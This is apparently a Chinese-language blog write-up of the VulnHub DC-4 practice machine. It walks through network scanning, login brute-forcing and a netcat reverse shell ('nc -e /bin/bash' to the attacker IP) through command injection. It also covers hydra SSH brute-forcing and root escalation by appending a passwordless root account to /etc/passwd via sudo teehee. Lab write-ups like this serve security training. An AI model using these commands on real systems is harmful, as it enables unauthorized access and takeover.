DC 靶场系列,最近懒得写文章,fw 找不到安服岗,在床上摆烂的日子是一天过得比一天快。。。。。
# 一、环境搭建
# 准备工具
kali
DC-4 靶机
# 靶机下载地址
- DC-4.zip (Size: 617 MB)
- Download: http://www.five86.com/downloads/DC-4.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-4.zip
安装过程略
安装过程请看 dc1/dc2
# 二、渗透过程
攻击机 (kali) ip:192.168.222.128
靶机 (DC-2) ip:192.168.222.129
# 信息收集
# 探测目标 ip
arp-scan
arp-scan -l |
探测出靶机的具体 ip
发现多余的 ip,扫一下端口开放
nmap
nmap -sV -p- 192.168.222.129 |
开放 22 80 两个端口
对 80 端口进行探查
# 爆破
进入到网页,只有赤裸裸的登陆框
这里我的思路是 查看源代码 (什么都没有) > 扫目录 (dirsearch/dirb 扫,什么都没有) > 弱口令 (什么都没有) > 爆破
这里只写成功过程,随便丢个字典爆破
看了其他大佬的文章说是正确密码:happy 我也不太确定,我这里估计是密码对了一次然后有 cookie 值,直接一路畅通
# RCE
登陆后发现很明显是个命令执行的按钮
bp!启动!
+ 替代空格
既然都能命令执行了,这肯定得弹个 shell
netcat
#攻击机上监听 | |
nc -lvp 4444 | |
#目标机上弹 shell | |
nc -e /bin/bash 192.168.222.128 4444 |
查看攻击机,发现已经成功了
这里我们利用 python 的交互式,避免反复弹 shell
python -c 'import pty;pty.spawn("/bin/bash")' |
思路:先查看有哪些 suid 权限的二进制文件
利用 SUID 提权
随便找个博客看就完事了
没见到有熟悉的可利用文件
# 再爆破
翻翻根目录,翻翻 home 文件,发现有三个用户名的文件夹,估计就是突破点了
一个个看下去只有 jim 有东西,估计是没权限查看,有个.sh 的文件
But I'd rather bash my head against a brick wall | |
但我宁愿用头撞墙 (机翻 |
这里提示要爆破,之前探测端口开放了 ssh
而且在 /home/jim/backups 目录下有个字典
扒下来爆破 (复制粘贴
hydra
破解工具 Hydra 使用详解
hydra -l jim -P 你的字典路径 192.168.222.129 ssh -V -t 50 | |
-V #显示过程 | |
-t #线程 | |
-l #指定用户名 | |
-P #指定字典 |
爆出来后 ssh 连接
ssh jim@192.168.222.129 |
连接成功后这里有个提示,有一份邮件
find / -name 'mail' 利用 find 大概搜索一下,发现 /var 目录下有一个 mail 文件夹
得到 charles 用户的密码
速度登陆 su charles
# 提权
登陆成功探索一番后什么也没发现
看大佬文章发现需要利用 sudo -l 查看用户的权限
该用户可以以 root 权限免密码执行 /usr/bin/teehee
teehee 提权
它可以在文件末尾追加数据,但是并不会覆盖原来文件
所以我们可以利用这个权限添加一个新用户到 /etc/passwd 文件里
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd |
越权成功,flag 在 /root 里
# 三、知识总结
# netcat
#攻击机上监听 | |
nc -lvp 4444 | |
#目标机上弹 shell | |
nc -e /bin/bash 192.168.222.128 4444 |
# hydra
hydra -l jim -P 你的字典路径 192.168.222.129 ssh -V -t 50 | |
-V #显示过程 | |
-t #线程 | |
-l #指定用户名 | |
-P #指定字典 |
# sudo -l
查看用户权限
# teehee 提权
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd |
